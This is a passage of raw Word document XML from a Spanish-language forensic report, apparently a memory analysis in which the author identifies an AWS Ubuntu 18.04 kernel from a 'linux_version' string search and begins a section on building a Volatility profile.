MXdu&#10;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lU7m54DAAAvCAAADgAAAAAAAAAAAAAAAAA6AgAA&#10;ZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEA5GWB3ZVHAQCVRwEAFAAAAAAAAAAAAAAAAAAE&#10;BgAAZHJzL21lZGlhL2ltYWdlMS5wbmdQSwECLQAUAAYACAAAACEATdggDtwAAAAFAQAADwAAAAAA&#10;AAAAAAAAAADLTQEAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAKomDr68AAAAIQEAABkA&#10;AAAAAAAAAAAAAAAA1E4BAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAA&#10;x08BAAAA&#10;">
                <v:shape id="Imagen 8" o:spid="_x0000_s1048" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:41579;height:8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nFtywAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8Mw&#10;DMXvg30Ho8Juq5Mx2pDWLd3G6Nhl9A/0KmI1Do3lEHtp1k8/HQY7Su/pvZ+W69G3aqA+NoEN5NMM&#10;FHEVbMO1gePh/bEAFROyxTYwGfihCOvV/d0SSxuuvKNhn2olIRxLNOBS6kqtY+XIY5yGjli0c+g9&#10;Jhn7WtserxLuW/2UZTPtsWFpcNjRq6Pqsv/2Bk5evxz47etc0626fQ5u6/Nua8zDZNwsQCUa07/5&#10;7/rDCv68mD8XsywXaPlJFqBXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBQNnFtywAA&#10;AOMAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                  <v:imagedata r:id="rId109" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1049" type="#_x0000_t202" style="position:absolute;left:42959;top:1207;width:11100;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jygAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwBC/i0m7dJnXZGENBvQy7Xbw9mrem2ryUJN3qtzeC4PH9/r/VZrSdOJMPrWMF+SQDQVw7&#10;3XKj4Hh4vn8AESKyxs4xKfimAJv19dUKS+0u/E7nKjYihXAoUYGJsS+lDLUhi2HieuLEnZy3GNPp&#10;G6k9XlK47eQ0yxbSYsupwWBPO0P1VzVYBfviY2/uhtPT27aY+dfjsFt8NpVStzfj9hFEpDH+i//c&#10;LzrNz+d5kc+X0xn8/pQAkOsfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOKUb+PKAAAA&#10;4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4584C311" w14:textId="5066CB62" w:rsidR="00B951D9" w:rsidRPr="00243EA7" w:rsidRDefault="00B951D9" w:rsidP="00B951D9">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>11</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="39" w:name="_Toc155782578"/>
                        <w:r w:rsidRPr="00C466EA">
                          <w:t>Búsqueda string linux_version</w:t>
                        </w:r>
                        <w:r>
                          <w:t>.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="39"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155717081 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>IV. Comando Strings linux version.</w:t>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF4190F" w14:textId="77DE33DA" w:rsidR="00542C58" w:rsidRDefault="00542C58" w:rsidP="00542C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Como no tenemos el perfil cargado dentro de volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</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542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, nos va a tocar hacer la tarea de cargar un perfil de este Sistema operativo para poder seguir ejecutando la aplicación volatility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A2235B" w14:textId="0C922540" w:rsidR="000D10AB" w:rsidRDefault="00542C58" w:rsidP="00542C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Buscando en </w:t>
      </w:r>
      <w:r w:rsidR="00345434" w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00345434">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linux version 4.15.0-1021.21-aws volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, nos encontramos solo un enlace en internet, el cual es </w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r w:rsidR="00345434" w:rsidRPr="00612555">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://lists.ubuntu.com/archives/bionic-changes/2018-August/016183.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, con ello nos encontrábamos con algo que ya se intuía previamente, y es que la versión del server de </w:t>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, es basada en un </w:t>
      </w:r>
      <w:r w:rsidR="00345434" w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 18.04, ya que la fecha que indica 4.15.18 es una fecha en tipo "d.mm.aa".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E476E" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E903CF5" w14:textId="0AAD31D4" w:rsidR="000D10AB" w:rsidRDefault="009D1689" w:rsidP="009D1689">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc155782510"/>
      <w:r w:rsidRPr="009D1689">
        <w:t>3.3.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D1689">
        <w:t>Creación de perfil para volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009D1689">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="24A41877" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E27B12E" w14:textId="0C74A38F" w:rsidR="004F35EE" w:rsidRPr="004F35EE" w:rsidRDefault="004F35EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155733932 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia XII.</w:t>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>] [</w:t>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155733958 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia XIII.</w:t>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
